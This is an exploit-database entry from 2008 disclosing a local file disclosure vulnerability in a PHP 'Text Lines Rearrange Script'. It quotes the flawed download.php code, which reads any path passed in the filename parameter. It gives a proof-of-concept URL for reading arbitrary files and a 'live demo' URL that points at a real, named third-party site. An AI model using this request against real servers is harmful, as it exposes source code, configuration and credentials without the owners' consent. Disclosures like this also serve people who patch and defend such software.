id: 4518
date: 12/22/2008
title: Text Lines Rearrange Script (filename) File Disclosure Vulnerability
author: SirGod
cves: 

====================================================================
Text Lines Rearrange Script (filename) File Disclosure Vulnerability
====================================================================


#############################################################################################
[+] Text Lines Rearrange Script (download.php filename) File
[+]Disclosure Vulnerability
[+] Discovered By SirGod
[+] Greetz : All my friends
#############################################################################################

 [+] File Disclosure Vulnerability

  Vulnerable Code in download.php :

-----------------------------------------------------

if(file_exists($filename))
{
	$fp=fopen($filename,"r");
	$content=fread($fp,filesize($filename));
	fclose($fp);
	
------------------------------------------------------	
	
 PoC :

  http://[target]/[path]/download.php?filename=[Local File]

 Example :

  http://[target]/[path]/download.php?filename=index.php

 Live Demo :

  http://www.rightscripts.com/listrearrange/download.php?filename=index.php

#############################################################################################



#  0day.today [2023-03-24]  #